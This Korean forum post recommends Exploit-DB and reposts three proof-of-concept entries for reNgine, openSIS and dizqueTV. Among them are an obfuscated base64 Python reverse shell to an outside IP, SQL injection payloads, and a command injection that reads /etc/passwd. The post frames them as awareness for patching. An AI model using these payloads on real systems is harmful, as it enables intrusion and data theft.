[정보] 서버 취약점 정보 제공해주는 사이트

카이루

프로필 보기 이 회원 글보기 이 회원의 댓글보기

· 1년 전 · 조회 314 314

링크

https://www.exploit-db.com/ (26)

Exploit-DB는 펜 테스터, 연구자, 해킹을 위한 공개적인 취약점 정보와 공격 코드를 제공하는 웹사이트입니다

지피지기 백전백승(知彼知己百戰百勝)이라고 내 취약점을 파악하여 보안 패치를 위해서 공유합니다.

2024-10-01 reNgine 2.2.0 - Command Injection (Authenticated) WebApps Multiple Caner Tercan

[code]

# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated)
# Date: 2024-09-29
# Exploit Author: Caner Tercan
# Vendor Homepage: https://rengine.wiki/
# Software Link: https://github.com/yogeshojha/rengine
# Version: v2.2.0
# Tested on: macOS

POC :

1. Login the Rengine Platform
2. Click the Scan Engine
3. Modify any Scan Engine
4. I modified nmap_cmd parameters on yml config
5. Finally, add a target in the targets section, select the scan engine you edited and start scanning.

payload :

'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh #’

[/code]

2024-10-01 openSIS 9.1 - SQLi (Authenticated) WebApps PHP Devrim Dıragumandan

[code]

# Exploit Title: openSIS 9.1 - SQLi (Authenticated) # Google Dork: intext:"openSIS is a product" # Date: 09.09.2024 # Exploit Author: Devrim Dıragumandan (d0ub1edd) # Vendor Homepage: https://www.os4ed.com/ # Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1 # Version: 9.1 # Tested on: Linux A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php. GET /Ajax.php?modname=x HTTP/1.1 --- Parameter: X-Forwarded-For #1* ((custom) HEADER) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae --- FIX: https://github.com/OS4ED/openSIS-Classic/pull/322

[/code]

2024-10-01 dizqueTV 1.5.3 - Remote Code Execution (RCE) WebApps JSP Ahmed Said Saud Al-Busaidi

[code]

# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE) # Date: 9/21/2024 # Exploit Author: Ahmed Said Saud Al-Busaidi # Vendor Homepage: https://github.com/vexorian/dizquetv # Version: 1.5.3 # Tested on: linux POC: ## Vulnerability Description dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers. ## STEPS TO REPRODUCE 1. go to http://localhost/#!/settings 2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'" 3. click on update 4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd

[/code]

댓글 작성

댓글을 작성하시려면 로그인이 필요합니다.

로그인하기

게시글 목록

번호	제목	글쓴이	조회	날짜
1463	[유틸] Hputty 한글판도 존재하네요 2	카이루	3,379	7년 전
1461	[자료] 윈도우10 바탕화면에 익스프로 아이콘 넣기 (레지스터) 3	카이루	6,619	7년 전
1460	[팁] 윈도우10 작업기록 보기 기능 해제	카이루	5,971	7년 전
1459	[유틸] Rufus 3.1 정식 1	카이루	3,418	7년 전
1457	[정보] Windows 10 버전1803 스펙터 패치 1	카이루	2,461	7년 전
1456	[자료링크] 포토샵 무료 필터 구굴 Nik 컬렉션	카이루	2,400	7년 전
1454	[OS] 윈도우10 April 2018 Update 업그레이드 시작 1	카이루	3,267	7년 전
1452	[정보] 윈도우 10 Windows 10 update Rs4 일정 4월 30일로 확정 1	카이루	1,847	7년 전
1451	[보안패치] 인텔 CPU 스펙터, 윈도용 보안패치가	카이루	1,958	7년 전
1450	[팁] 윈도우10 ISO 정식 다운로드	카이루	2,901	7년 전
1448	[팁] 오피스[엑셀,파워포인트,워드] 명령 상태바 숨기기 2	카이루	2,812	7년 전
1446	[유틸] 스마트메이커 앱자동 제작 프로그램이라는것도 있네요 1	카이루	2,943	7년 전
1445	Windows10 RS4 RTM 17133 퇴출당함	카이루	2,263	7년 전
1442	Windows10 RS4 RTM 17133 업데이트 2	마젠토	2,461	7년 전
1440	[유틸] 자료 공유 프로그램 1	카이루	3,270	7년 전
1438	[뉴스] 구글의 해커, 비트토렌트 클라이언트에서 치명적 취약점 발견	카이루	2,252	7년 전
1429	[뉴스] 삼성전자, 세계 최초 30TB SSD 양산 4	카이루	2,277	7년 전
1427	[정보] 오피스 2019 설치기 10	카이루	4,719	7년 전
1423	[정보] 마소에 뻥... 윈도우10 업그레이드 차단 안됨 2	카이루	2,519	7년 전
1421	i5 중 에서도 로컬 홈네트워크 파일 전송속도 100mb/s 안되는게 있네요. 2	스노든	1,823	7년 전
1417	Intel Xeon D-2100 Processors 라인업 3	사랑은봄비처럼	1,701	7년 전
1415	[프리웨어 추천] 중복된 자료를 찾을 때 쓰는 툴 1	사랑은봄비처럼	4,898	7년 전
1414	[정보] 윈도7·8.1로 최신 MS오피스 못 쓴다	마젠토	2,099	7년 전
1412	[정보] 인텔 cpu 보안 패치 - 수정된 윈도 업데이트	카이루	1,986	7년 전
1411	[유틸] Scan and identify network devices(네트워크 검색 및 속도테스트)	카이루	2,032	7년 전
1410	[정보] AMD 기반 장치의 Windows 운영 체제 보안 업데이트 블록	카이루	2,038	7년 전
1408	[유틸] 인텔 cpu 보안 패치파일 정리 1	카이루	2,793	7년 전
1406	[정보] 윈도우10 업그레이드 1월 16일까지 연장 1	카이루	2,023	7년 전
1405	[정보] V3 제품군(기업용/개인용) 패치 안내	카이루	2,111	7년 전
1404	[정보] 인텔 칩 보안 버그, 수정패치 적용시 성능저하 / MS 9일 패치 공개 예정	카이루	1,622	7년 전

이전 다음

7 8 9 10 11

전체 목록

[정보] 서버 취약점 정보 제공해주는 사이트

링크

댓글 작성

게시글 목록

소모임